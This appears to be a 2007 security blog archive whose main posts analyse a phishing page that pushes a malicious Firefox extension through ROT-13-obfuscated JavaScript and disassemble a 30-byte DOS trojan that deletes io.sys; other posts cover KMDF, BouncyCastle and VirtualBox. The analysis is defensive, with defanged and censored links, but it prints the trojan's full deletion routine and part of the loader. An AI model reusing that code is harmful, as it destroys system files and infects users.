[MALWARE] Bank Of America Virus!!

September 29, 2007

Warning: This post contains Malware, pay attention!!!!

The site hxxp://bankofamerica.ulmb.com/do.php?cmd=SignIn (spreaded with Spam Mail) contains a Malware, not explicitly linked.
I’ve used Malzilla to inspect URL content, a suspicious message appears:

Browser Update Required!

This web site uses functions which is not compatible with your current browser version To update your browser please install the requiredupdate to view this page.

Very strange, that no checks about the compatibility are performed before this message, so let’s inspect further..

<script type=”text/javascript”>

var myf_1 = 60;

var myf_10 = “1”;
var myf_11 = “82SSN573-38NN-482N-99NQ-91S697O91631”;
var myf_12 = “uggc://jjj.svyr2lbh.arg/nccyrg.pno”;

These two strings seems to be Obfuscated Links , let’s see the rest of the Evil Code, have a function dc(str), that decodes with an easy algorithm (ROT-13 Encryption) an encrypted string, next we have a function install_ff_result() and function install_ff_ext() that installates FireFox Extension.

Now the extension file is taken from a supect source, file2you, a bit poor for Banks of America, you don’t think? πŸ™‚

So let’s see what are the obfuscated links:

hxxp://www.file2you.net/{censored against lamah}.cab


hxxp://www.file2you.net/{censored or lamah}.xpi

Both these links contains the same Malware.

In the next post, i’ll report what this Malware FF Extension does..

See you to the next post πŸ™‚

KMDF’s NTSTATUS Return Values

September 29, 2007

Frequently happens that, KMDF Functions returns strange status values, that can’t be founded into NtStatus.h, this causes to Newbie KMDF Coders some confusion, the solution is easy, just take a look at \inc\wdf\kmdf\10\wdfstatus.h πŸ˜‰

See you to the next post πŸ™‚

[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).

This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you to the next post πŸ™‚

BouncyCastle Experiment Good Results #2

September 27, 2007

Good news from my BouncyCastle Crypto Libs.

I’ve just finished the MultiHasher Experiment, cause a lack of documentation I wasn’t sure of I/O functions but Peter Dettman clarified me something:

for the Byte encoding of the string, could be used the Classical Encoder class of System.ComponentModel, in this way:

InputBuffer = Encod.GetBytes(YourString);

Is used UTF8Encoding instead of ASCII Encoding:

textBox1.Text = Encod.GetString(Hex.Encode(outBuffer));

See you to the next post πŸ™‚

[VirtualBox] Xp Installation Problems

September 26, 2007

Today I’ve installed an Xp VM powered by VirtualBox, but initially I’ve encountered a problem that blocked the installation.

As indicated by VBox i’ve choised 192 MB for VM’s Memory, but at the step of NTFS Formattation VBox shuts down with the following error:


So I setted the memory at 125 MB and installation worked fine.

Remember don’t believe to the Indicated Memory Usage πŸ˜‰

See you to the next post πŸ™‚

First Experiments with BouncyCastle CryptoLib

September 25, 2007

In these day I’m experimentig a promising library which implements many Crypto Algorithms, called BouncyCastle (which is for .NET, and I’m coding in C#).

Library, seems to be complete and to have good implementations of Common Algorithms, EllipticCurveCryptography, Certifications, OpenPGP, OpenSSL.

A part a little leak of performances in ECIES algorithm, seems to work great.

The big problem is that Hex Conversion functions have some problem, for example Hex.Decode() , fails when the string passed have an odd lenght.

To dayI’ve sent an email to the coders, hope in a fast reply, if i discover how to solve also other minor problems (actually no time to mention all) i’ll post here the fixed piece of code πŸ˜‰

See you to the next post πŸ™‚

Attacking MultiCore CPUs

September 25, 2007

Recently was published an intersting Security Flaw and realtuΒ  for MultiCore CPUs, here you can find a generic Overview, and here a more Detailed descryption of the Vulnerability πŸ™‚

See you to the next post! πŸ™‚